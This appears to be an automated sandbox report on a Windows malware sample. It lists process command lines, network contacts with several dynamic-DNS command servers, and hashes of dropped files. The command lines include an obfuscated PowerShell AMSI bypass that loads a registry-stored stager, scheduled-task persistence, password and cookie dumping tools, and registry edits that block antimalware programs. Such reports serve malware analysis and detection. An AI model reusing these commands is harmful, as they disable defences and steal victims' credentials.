schtasks.exe /RU Admin /create /tn "$77Stellacy.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /sc minute /mo 1 /RL HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /RU Admin /create /tn "$77SX.job" /tr "'C:\Windows\System32\Wscript.exe'C:\Users\Admin\AppData\Local\Microsoft\Windows\$77vbs.vbs" /sc minute /mo 40 /RL HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks /RU Admin /create /tn "$77STLR.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" /sc onstart /RL HIGHEST /f

C:\Windows\system32\timeout.exe

timeout 10

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "$77Quasar.job" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /rl HIGHEST /f

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 3d7545f5200a47d233b3f2f8f659efad WVQAETX4RU+OCJDHATFoIA.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4cciCKuj10fS4tEFtsNPmrL/0jPo2AcIdfc9jK0U15Lp5iXQGku3ZLiCUn4WwDSh+A0ftN5CXUAmVy5X4PPHFWMzuIK7S46Iv9KhQeGUN+idJw7zi086Au7DP0yct2lQY=

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe"

C:\Windows\system32\timeout.exe

timeout 20

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WanTajdusvCi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YbAhvEdfwiywiX,[Parameter(Position=1)][Type]$XAGLRCYBxk)$aUEeznrsWJp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$aUEeznrsWJp.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$YbAhvEdfwiywiX).SetImplementationFlags('Runtime,Managed');$aUEeznrsWJp.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$XAGLRCYBxk,$YbAhvEdfwiywiX).SetImplementationFlags('Runtime,Managed');Write-Output $aUEeznrsWJp.CreateType();}$vfvBfeSrphbGm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$rhAIJHZXwnCuUb=$vfvBfeSrphbGm.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tOkucufcqJuEeHBOXif=WanTajdusvCi @([String])([IntPtr]);$sBxwAOIYsTUghGSQmOhzBI=WanTajdusvCi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rbFjmeZKjzf=$vfvBfeSrphbGm.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ZMaZtRoFFGmQJZ=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$rbFjmeZKjzf,[Object]('Load'+'LibraryA')));$NDNmMGzHCxnxcqqmU=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$rbFjmeZKjzf,[Object]('Vir'+'tual'+'Pro'+'tect')));$smSFNae=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZMaZtRoFFGmQJZ,$tOkucufcqJuEeHBOXif).Invoke('a'+'m'+'si.dll');$RJWkHcQIUZqPNUrix=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$smSFNae,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WhhbfUqHtK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDNmMGzHCxnxcqqmU,$sBxwAOIYsTUghGSQmOhzBI).Invoke($RJWkHcQIUZqPNUrix,[uint32]8,4,[ref]$WhhbfUqHtK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$RJWkHcQIUZqPNUrix,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDNmMGzHCxnxcqqmU,$sBxwAOIYsTUghGSQmOhzBI).Invoke($RJWkHcQIUZqPNUrix,[uint32]8,0x20,[ref]$WhhbfUqHtK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:LPpCafCnPhGW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rbwbyRJwDfjMMc,[Parameter(Position=1)][Type]$BhvZKaLGRD)$mvwfdZfGBQc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$mvwfdZfGBQc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$rbwbyRJwDfjMMc).SetImplementationFlags('Runtime,Managed');$mvwfdZfGBQc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$BhvZKaLGRD,$rbwbyRJwDfjMMc).SetImplementationFlags('Runtime,Managed');Write-Output $mvwfdZfGBQc.CreateType();}$CxKhFyPBjiDDB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$CdjVPztmwZThlQ=$CxKhFyPBjiDDB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PgQSsNxxivDMKKUvVcQ=LPpCafCnPhGW @([String])([IntPtr]);$VVrxkLvpZIlYISqOIcGKFw=LPpCafCnPhGW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aEaENWQeyqy=$CxKhFyPBjiDDB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ptJYyEEyVqFZiM=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$aEaENWQeyqy,[Object]('Load'+'LibraryA')));$bHkrZewmoHwTPxthi=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$aEaENWQeyqy,[Object]('Vir'+'tual'+'Pro'+'tect')));$GYnbwZW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptJYyEEyVqFZiM,$PgQSsNxxivDMKKUvVcQ).Invoke('a'+'m'+'si.dll');$cvXEVGvFkffjFmvEu=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$GYnbwZW,[Object]('Ams'+'iSc'+'an'+'Buffer')));$BNQEsTfAgW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bHkrZewmoHwTPxthi,$VVrxkLvpZIlYISqOIcGKFw).Invoke($cvXEVGvFkffjFmvEu,[uint32]8,4,[ref]$BNQEsTfAgW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cvXEVGvFkffjFmvEu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bHkrZewmoHwTPxthi,$VVrxkLvpZIlYISqOIcGKFw).Invoke($cvXEVGvFkffjFmvEu,[uint32]8,0x20,[ref]$BNQEsTfAgW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{877d7f65-92aa-4771-b2cf-8fde54bedb2c}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{e6194327-a952-4558-90c8-ce6936860160}

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"

C:\Users\Admin\AppData\Local\Temp\splwow64.exe

C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"

C:\Users\Admin\AppData\Local\Temp\hh.exe

C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\xwizard.exe

C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\system32\ReAgentc.exe

reagentc.exe /disable

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\reagentc.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\reagentc.exe" /grant *S-1-5-32-544:F /T /C /Q

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\reagent.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\reagent.dll" /grant *S-1-5-32-544:F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /im "SecurityHealthSystray.exe" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MRT" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MRT.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "rkill.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "rkill32.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "rkill64.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "MBSetup.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "mbam.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "mbar.exe" /f

C:\Windows\system32\timeout.exe

timeout 2

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 stellacy.duckdns.org udp
US 87.249.134.21:55562 stellacy.duckdns.org tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 itroublvehacker.gq udp
US 8.8.8.8:53 api64.ipify.org udp
US 104.237.62.213:443 api64.ipify.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 213.62.237.104.in-addr.arpa udp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 stellacy.ydns.eu udp
SE 193.138.218.173:55562 stellacy.ydns.eu tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 stellacy.tk udp
IE 3.249.173.109:55562 stellacy.tk tcp
US 8.8.8.8:53 stellacy2.duckdns.org udp
SE 193.138.218.173:55562 stellacy2.duckdns.org tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 stellacy.duckdns.org udp
US 87.249.134.21:55562 stellacy.duckdns.org tcp
SE 193.138.218.173:55562 stellacy2.duckdns.org tcp

Files

C:\Users\$77main1.exe

MD5 40f541872b9b1f1da056ac6d4bc90ea4
SHA1 6e121d49311a8df04a70b6de6069460f2d55f609
SHA256 65453a408cdcd028c8e1b091abe9397d73e2cba9708b71feac6c9ccaa497ce90
SHA512 8456bd7ea4f898a96bd62b870f2aab466eaa4f0b0f446a108f16a9fb9ef84cd433ec9125931875138b281a9347f8ab9d99bc9d3dc54e89fb8e268f151d6dc74e

C:\Users\Admin\AppData\Local\Temp\7D8C.tmp\7D8D.tmp\7D8E.bat

MD5 ad9f604467f73ca7ddfef6f71dcf4798
SHA1 544808b2d40f5249b65c6e1e4abcd32f3af1a896
SHA256 7b8951b26d5ddf383a7ff37e5f2579be975d8702f7109dbc8f8393563a720ef0
SHA512 c59c1777bb07e82e35325274460adffd4b4ca216fbdc20c694ee92af772d9ce1a45ba18bd2c626083beef8e95bae82fb365414ca63100e6cc6262c2459a575f3

memory/2816-13-0x00007FFF6DB63000-0x00007FFF6DB65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gvvr54mu.m4x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2816-23-0x00000121A6C60000-0x00000121A6C82000-memory.dmp

memory/2816-24-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

memory/2816-25-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

memory/2816-28-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

C:\Users\$77Redownloader.exe

MD5 067d274dc271710cb8afd7c0680958fe
SHA1 4282104ec316c3452a81afc623c61ed348331436
SHA256 c53fbf5e1b8a3c6c3930073c359a07aa6fcccfb1a0275dab49ed6584c20aa051
SHA512 3c3a4c4678c735419d6e92570e5c9fd0cd5b34a46bb025b71c8925a27c64f9d3e5d20b16610e3085477c88b309dcbe4335aa3d6c3bac334ab461759f1320a29c

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

MD5 9d972046c0e663416177f42d19f38e35
SHA1 23aeec718eed2be8adf5380311fc787db03bfc43
SHA256 ad541a7a9372fb33689839ac297536ff01cab78c51df04c4334cf4ce2dd4e9a4
SHA512 25e9ba52944348c5ce54df6da8efc5025aa9b8c7e4fe25f56a386f285878c3d1ef27dd5fcc22e9c51dfe25a811a0484d314b21ecfdc352d2f4bdade4e68bf808

C:\Users\Admin\AppData\Local\Microsoft\Windows\Backup.bat

MD5 73336bee4fa2b1c3751fa012c9333a79
SHA1 2cc55d9440ed3c17e6b05466c10334b0d3ef0408
SHA256 435662c5b86525b076aa25aa55f06ab2f41bf34bb032544c466feac53ea378b2
SHA512 8eefbe6eb117387ab6a88a6a7d4aa919d935df22e4d60ebb3247462f9df3ea76ec4293dd2d57445a40a9c2c23188900a297e0543cec6e9ef54555617163852b8

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe

MD5 b7062a62e271b7dd402b7406f8a611ad
SHA1 952cbd23fd41cbc40d17c988de946ec983d262de
SHA256 d93529443f83e24a4ca90e835ab5b46fc83337862e5ab08343722945a002279c
SHA512 2f7aec552d2bcc53a218e4353c29f71e0b0af4b0c4a51c59f4ad4116e5cf46bde4584d61d3738260fb48fa03a79ec0202ba750e6e8434f4b0d3e12560fa94867

memory/4748-52-0x0000000000700000-0x0000000000708000-memory.dmp

memory/4748-54-0x000000001B240000-0x000000001B2DE000-memory.dmp

memory/3228-55-0x00000000004F0000-0x00000000007EE000-memory.dmp

memory/3228-56-0x0000000005700000-0x0000000005CA4000-memory.dmp

memory/3228-57-0x0000000005300000-0x0000000005366000-memory.dmp

memory/4748-58-0x000000001B1D0000-0x000000001B1E2000-memory.dmp

memory/4748-61-0x000000001B3E0000-0x000000001B41C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

MD5 88ab0bb59b0b20816a833ba91c1606d3
SHA1 72c09b7789a4bac8fee41227d101daed8437edeb
SHA256 f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA512 05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

memory/4720-74-0x000001E7DA5C0000-0x000001E7DA89A000-memory.dmp

memory/4720-75-0x000001E7F4F90000-0x000001E7F52D2000-memory.dmp

memory/4720-76-0x000001E7DAE40000-0x000001E7DAE46000-memory.dmp

memory/4720-77-0x000001E7DC6A0000-0x000001E7DC716000-memory.dmp

memory/4720-78-0x000001E7F4E40000-0x000001E7F4EF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\config

MD5 1ba367d0f9aac0f650e65ab7401776c0
SHA1 75cf3295125cfaa0c247ebccc57e63f915198683
SHA256 68c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03
SHA512 45ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c

memory/4720-110-0x000001E7DAF20000-0x000001E7DAF50000-memory.dmp

memory/4720-112-0x000001E7F4EF0000-0x000001E7F4F0A000-memory.dmp

memory/4720-113-0x000001E7F4F10000-0x000001E7F4F42000-memory.dmp

memory/4720-111-0x000001E7DAF50000-0x000001E7DAF5C000-memory.dmp

memory/4720-114-0x000001E7F5DC0000-0x000001E7F5E62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe

MD5 964c5fffcba7f353cf12d09675a46de6
SHA1 9462c1249ef86c39da01b7480f1b2ce4a2a1a7b9
SHA256 b54e5acf0ab77f4eadf2920814d9bb3396e678fc5805fb296f9f59c41a1c52ed
SHA512 ab6dd5c11abc1abf164532f50a42584189ff1a812b255221a9705dfc47f57120e7d7f241bbb802114de79d165b002283b18a6c96b2e6e3ddc4b062757f0f8565

memory/1252-127-0x00000000014A0000-0x00000000014D6000-memory.dmp

memory/1252-128-0x00000000041E0000-0x0000000004808000-memory.dmp

memory/1252-129-0x0000000003D00000-0x0000000003D22000-memory.dmp

memory/1252-130-0x0000000003DA0000-0x0000000003E06000-memory.dmp

memory/1252-149-0x0000000004810000-0x0000000004B64000-memory.dmp

memory/4720-150-0x000001E7DC760000-0x000001E7DC768000-memory.dmp

memory/1252-151-0x0000000004DB0000-0x0000000004DCE000-memory.dmp

memory/1252-152-0x0000000005310000-0x000000000535C000-memory.dmp

memory/4720-156-0x000001E7F6060000-0x000001E7F607E000-memory.dmp

memory/2728-159-0x000001D3D6B70000-0x000001D3D6BAE000-memory.dmp

memory/2728-163-0x00007FFF8B2E0000-0x00007FFF8B39E000-memory.dmp

memory/2728-160-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

memory/3480-164-0x0000000140000000-0x0000000140040000-memory.dmp

memory/3480-167-0x00007FFF8B2E0000-0x00007FFF8B39E000-memory.dmp

memory/3480-166-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

memory/3480-165-0x0000000140000000-0x0000000140040000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.vbs

MD5 ca906422a558f4bc9e471709f62ec1a9
SHA1 e3da070007fdeae52779964df6f71fcb697ffb06
SHA256 abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512 661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

memory/1252-171-0x0000000006660000-0x0000000006CDA000-memory.dmp

memory/1252-172-0x00000000052D0000-0x00000000052EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 808099bfbd62ec04f0ed44959bbc6160
SHA1 f4b6853d958c2c4416f6e4a5be8a11d86f64c023
SHA256 f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8
SHA512 e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

memory/4764-178-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4764-177-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

MD5 053778713819beab3df309df472787cd
SHA1 99c7b5827df89b4fafc2b565abed97c58a3c65b8
SHA256 f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe
SHA512 35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

memory/4764-181-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4632-188-0x00000000021D0000-0x00000000021EC000-memory.dmp

memory/3256-194-0x00000000024A0000-0x00000000024C2000-memory.dmp

memory/3256-196-0x000000006F730000-0x000000006F740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt

MD5 2538ec9e8425a905937573069b77d4c2
SHA1 ad0c2b7aff4382e23444d26adac96d9697b849f3
SHA256 29338949fae4c88a972837aae898529e4c7a2c4df35982eef2f8d7b602c17f4e
SHA512 a867a471b837b9c662528ee7a5904e8fe7b1eebb277b8a7fe4d4caf423fae914baf692bb5004c02ddb539b157d63326178467e28b03aa92a533cda19155d501c

memory/3256-201-0x0000000000400000-0x000000000047C000-memory.dmp

memory/3256-200-0x00000000024A0000-0x00000000024C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 eb51755b637423154d1341c6ee505f50
SHA1 d71d27e283b26e75e58c0d02f91d91a2e914c959
SHA256 db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9
SHA512 e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

MD5 a776e68f497c996788b406a3dc5089eb
SHA1 45bf5e512752389fe71f20b64aa344f6ca0cad50
SHA256 071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1
SHA512 02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

memory/4388-214-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\splwow64.exe

MD5 0d8360781e488e250587a17fbefa646c
SHA1 29bc9b438efd70defa8fc45a6f8ee524143f6d04
SHA256 ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64
SHA512 940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

memory/4348-218-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4348-222-0x000000006F730000-0x000000006F740000-memory.dmp

memory/4348-227-0x00000000006E0000-0x0000000000702000-memory.dmp

memory/4348-230-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hh.exe

MD5 4d4c98eca32b14aeb074db34cd0881e4
SHA1 92f213d609bba05d41d6941652a88c44936663a4
SHA256 4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f
SHA512 959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

memory/4348-221-0x00000000006E0000-0x0000000000702000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cookies3

MD5 fd1cd719731a16bb2c7d4e7ff2ad0032
SHA1 9b7bbc8f369c8a9b854696e1c3188224789b7c0b
SHA256 b5101ea84e30f9a33db887c27cfeb7b8344ad0e8f93e0f2cd52329443d5d4613
SHA512 9d264dc1efaaff1303362d5686759de58ecdb4ae99f49f0b8319c54f063230ea1dfb53bfc3e618b82aaf816b994ccb89a0e4a25b7d734f2f624ac70f539850d0

C:\Users\Admin\AppData\Local\Temp\Cookies1

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/3480-240-0x0000000140000000-0x0000000140040000-memory.dmp

memory/668-247-0x00000108BDD10000-0x00000108BDD3A000-memory.dmp

memory/380-253-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/380-252-0x0000019C64790000-0x0000019C647BA000-memory.dmp

memory/920-261-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

